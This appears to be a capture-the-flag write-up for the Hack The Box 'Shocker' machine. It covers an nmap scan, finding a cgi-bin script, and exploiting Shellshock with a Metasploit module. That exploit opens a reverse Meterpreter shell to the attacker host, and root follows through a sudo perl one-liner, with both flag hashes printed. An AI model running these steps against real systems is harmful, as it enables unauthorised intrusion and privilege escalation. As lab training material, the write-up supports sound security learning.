- Service Enumeration
- Further Enumeration
- Exploit discovery
- Meterpreter
- Privesc
Nmap
Network mapper reveals open port 80, running Apache 2.4.18.
nmap -sC -sV -p-65535 --script vuln 10.10.10.56
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
..[snipped bunch of false-positives]..
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
..[snipped bunch of false-positives]..
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 379.45 seconds
Go to the WebApp:
The application does not reveal much.

Page source:
y>
<h2>Don't Bug Me!</h2>
<img src="bug.jpg" alt="bug" style="width:450px;height:350px;">
</body>
</html>
Dirbuster:
The next logical thing is to bruteforce the directories/files in order to find hidden directories. While using dirbuster I’ve found a cgi-bin folder and looked for sensitive files such as php, sh, txt, pdf .

Shellshock
What is shellshock? Check this well done document on the topic:OWASP SHELLSHOCK
Finding and Exploiting Shellshock
msf6 > search shellshock
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
The following is the output from scanning the target uri by using the seen below msf module: http://10.10.10.56/cgi-bin/user.sh
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit
[+] uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Searching for suitable shellshock exploit:
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > search shellshock
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
1 auxiliary/server/dhclient_bash_env 2014-09-24 normal No DHCP Client Bash Environment Variable Code Injection (Shellshock)
2 exploit/linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock)
3 exploit/linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock)
4 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
5 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
6 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock)
7 exploit/multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution
8 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
9 exploit/osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
10 exploit/unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock)
11 exploit/unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock)
Interact with a module by name or index. For example info 11, use 11 or use exploit/unix/smtp/qmail_bash_env_exec
By using the show info command I have found a suitable exploit for our case:
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show info 5
Name: Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
Module: exploit/multi/http/apache_mod_cgi_bash_env_exec
Platform:
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2014-09-24
Provided by:
Stephane Chazelas
wvu <[email protected]>
juan vazquez <[email protected]>
lcamtuf
Available targets:
Id Name
-- ----
0 Linux x86
1 Linux x86_64
*(removed some info)*
Payload information:
Space: 2048
Description:
This module exploits the Shellshock vulnerability, a flaw in how the
Bash shell handles external environment variables. This module
targets CGI scripts in the Apache web server by setting the
HTTP_USER_AGENT environment variable to a malicious function
definition.
References:
https://cvedetails.com/cve/CVE-2014-6271/
https://cvedetails.com/cve/CVE-2014-6278/
https://cwe.mitre.org/data/definitions/94.html
OSVDB (112004)
https://www.exploit-db.com/exploits/34765
https://access.redhat.com/articles/1200223
https://seclists.org/oss-sec/2014/q3/649
Also known as:
Shellshock
Next, I am selecting the exploit, setting the requirements and running it, resulting in a meterpreter session.
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI http://10.10.10.56/cgi-bin/user.sh
TARGETURI => http://10.10.10.56/cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.4:1234
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (980808 bytes) to 10.10.10.56
[*] Meterpreter session 1 opened (10.10.14.4:1234 -> 10.10.10.56:57692) at 2021-04-07 10:02:11 -0400
In the following section I have checked who am I logged-in as. Traversed to the home dir of that user and listed files, finding the user flag. In this case I was kind of lucky to check the sudoers file for misconfiguration as a very first thing. Finally, we can privesc with perl.
meterpreter > shell
Process 1530 created.
Channel 1 created.
ls
user.sh
whoami
shelly
cd
ls
user.txt
cat user.txt
3b52250728977779d192b0262d2c2d7e
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
sudo perl -e 'exec "/bin/bash"'
whoami
root
cd /root/
ls
root.txt
cat root.txt
f77dc0ce91af01ad16326409e1d05b68